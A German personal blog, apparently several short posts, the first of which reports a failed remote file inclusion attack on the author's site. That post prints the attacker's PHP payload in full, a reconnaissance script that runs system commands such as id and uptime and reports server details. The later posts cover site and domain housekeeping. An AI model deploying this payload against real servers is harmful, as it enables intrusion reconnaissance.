Aus dem Leben eines angehenden Informatikers

… und warum es hier nicht klappt

Grade in meinem Stattool gesehen, dass jmd versucht hat, über einen typischen Includelink (?page=link) eine Datei bei mir auf dem Webspace auszuführen (der Versuch war btw auf meiner statischen Page, nicht im WordPress…)

Hier der Inhalt der Datei:

<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>

Leider leider leider kann man diesen Code und den Include aus mehreren Gründen bei mir vergessen…

1. gibt es bei mir keine $_GET["page"] und wenn es eine gäbe, würde diese gefiltert…

2. ein Teil der Befehle, welche oben ausgeführt werden, sind durch Nenad gesperrt

3. Short Open Tags? Klar, sowas werd ich verwenden… weil die so Zukunftsweisend sind und bei den nächsten php-Versionen noch vorhanden sein werden

Auf jeden Fall ging dieser Angriff ins Leere (bzw diese Angriffe, es waren 2 an der Zahl)… ich werde weiterhin ein Auge darauf haben… Ach ja, die Datei wurde von einer seriösen Seite aus includiert… soll ich die warnen?

So long, and thanks for all the fish (and fun mit dem “Hacking” )

Hab eben einen kleinen Fix ausgeführt, der so gar nich auffällt/aufgefallen ist… und zwar hatte ich im Header meines Themes einen Verweis auf eine nicht vorhandene Grafik, und dieser Verweis auch noch relativ (da ja im WP die Links recht unterschiedliche Tiefen haben können eine sehr interessante Sache)
Meine Lösung: img-Tag killen, hr hinsetzen Und siehe da, es geht…

Demnächst sollte ich echt mal mit einem eigenen Design anfangen (ich habs schon ewig vor…) – aber irgendwie komm ich nich dazu…

So long and thanks for all the fish

Hab ich jetzt bei badboy_ und Feuerfuchs gesehen – wenn man darüber bloggt, dass united-domains bis Ende des Monats (solange der Vorrat reicht) eine Weltkarte mit allen TLDs verschenkt und den Link zum Artikel an aktion@united-domains.de schickt, bekommt man die Karte geschenkt… da bin ich doch gleich dabei

So long and thanks for all the fish (und die Weltkarte im vorraus)

Nachdem aptgetupdate (wiedermal) eine Aktion hat, bei der die Leser ihre Desktops einsenden können, kam ich auf die Idee, auf dem eigenen Blog die eigenen Desktops (ja ich hab viele) anzuzeigen und gleich eine Liste mit verwendeten Programmen und Configs mitzuliefern.

Das ganze wird hier auf der Unterseite Meine Desktops passieren – logisch

Ich werd auch nachher gleich den Anfang machen und mein Windows XP vorstellen, vor allem da sich da in letzter Zeit viel getan hat.

Mal sehen ob ich die bestehenden Daten immer überschreiben werde, oder ob sich irgendwann ein Archiv ansammeln wird…

Viel Spaß beim anschauen (und vllt auch beim ausprobieren, denn bis auf 1, 2 Ausnahmen sind alle Programme kostenlos oder sogar OpenSource)

So long, and thanks for all the fish und so

Als ich den Titel vorhin gelesen hatte dachte ich erstmal an eine Wine-Installation auf USB… was es wirklich ist ist recht abgefahren…

http://www.mensup.fr/usbwine/?act=insc&mp=USBWINE&o=92&p=61

via aptgetupdate

Heute hab ich alles fertig gestellt – meine Page ist auf meine neue Domain umgestellt.

Meine alte Page leitet alle Requests auf die Startseite um, diese hat einen Reload auf die neue Domain – damit sollte es eigentlich jeder merken

Außerdem hab ich mich dazu entschieden, im Laufe des Monats den Support für den Internet Explorer 6 einzustellen. Ich hab einfach genug von dem Ding… wer mitmachen will soll es tun

So long and thanks for all the fish und so